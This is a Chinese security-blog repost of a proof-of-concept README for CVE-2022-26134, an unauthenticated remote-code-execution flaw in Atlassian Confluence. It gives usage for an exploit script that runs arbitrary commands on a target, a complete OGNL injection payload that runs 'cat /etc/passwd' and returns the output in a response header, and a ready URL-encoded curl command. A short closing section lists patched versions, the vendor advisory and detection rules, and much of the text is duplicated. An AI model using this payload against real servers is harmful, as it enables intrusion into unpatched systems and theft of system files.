CVE-2022-26134 - OGNL 注入漏洞

admin 2022年6月11日19:47:52评论108 views字数 2256阅读7分31秒阅读模式
6月11日-漏洞公告

CVE-2022-26134 - OGNL 注入漏洞。

利用影响 Atlassian Confluence 7.18 及更低版本产品的远程代码执行漏洞的脚本概念验证。OGNL 注入漏洞允许未经身份验证的用户在 Confluence 服务器或数据中心实例上执行任意代码。


受影响的版本

所有受支持的 Confluence Server 和 Data Center 版本都会受到影响。

Confluence Server 和 Data Center 1.3.0 之后的版本和 7.18.1 以下的版本会受到影响。

该漏洞的 CVSS 得分为 10 分(满分 10 分)的严重性。


依赖项:

Python 3.3+

可以通过 pip install -r requirements.txt 满足依赖关系

如何使用:

克隆仓库


git clone https://github.com/Nwqda/CVE-2022-26134

cd CVE-2022-26134

然后,您可以使用您选择的命令运行漏洞利用程序,如下所示:


python3 cve-2022-26134.py https://target.com CMD

python3 cve-2022-26134.py https://target.com id

python3 cve-2022-26134.py https://target.com "ps aux"

视频概念证明

脚本 PoC CVE-2022-26134

CVE-2022-26134 - OGNL 注入漏洞。

利用影响 Atlassian Confluence 7.18 及更低版本产品的远程代码执行漏洞的脚本概念验证。OGNL 注入漏洞允许未经身份验证的用户在 Confluence 服务器或数据中心实例上执行任意代码。


受影响的版本

所有受支持的 Confluence Server 和 Data Center 版本都会受到影响。

Confluence Server 和 Data Center 1.3.0 之后的版本和 7.18.1 以下的版本会受到影响。

该漏洞的 CVSS 得分为 10 分(满分 10 分)的严重性。


依赖项:

Python 3.3+

可以通过 pip install -r requirements.txt 满足依赖关系


如何使用:

克隆仓库

git clone https://github.com/Nwqda/CVE-2022-26134cd CVE-2022-26134

然后,您可以使用您选择的命令运行漏洞利用程序,如下所示:

python3 cve-2022-26134.py https://target.com CMDpython3 cve-2022-26134.py https://target.com idpython3 cve-2022-26134.py https://target.com "ps aux"

PoC CVE-2022-26134

CVE-2022-26134 - OGNL 注入漏洞


视频概念证明

https://youtu.be/AoPVDMihNgA


有效载荷

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("cat /etc/passwd").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

CURL 命令示例:

curl --head -k "https://YOUR_TARGET.com/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat%20%2Fetc%2Fpasswd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D" 

然后,命令的结果将反映在X-Cmd-Response响应头中的参数中。


供应商的缓解指南

遵循 Atlassian 的官方建议:

https ://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html


修补版本

Atlassian 发布了 7.4.17、7.13.7、7.14.3、7.15.2、7.16.4、7.17.4 和 7.18.1 版本,其中包含针对此问题的补丁。


检测能力

此漏洞影响所有自托管实例。如果您使用 WAF,则可以${在内部阻止 URL。


YARA(通过 Volexity):

https ://github.com/volexity/threat-intel/blob/main/2022/2022-06-02%20Active%20Exploitation%20Of%20Confluence%200-day/indicators/yara.yar

原文链接:https://github.com/Nwqda/CVE-2022-26134

原文始发于微信公众号(Ots安全):CVE-2022-26134 - OGNL 注入漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年6月11日19:47:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-26134 - OGNL 注入漏洞https://cn-sec.com/archives/1109513.html

发表评论

匿名网友 填写信息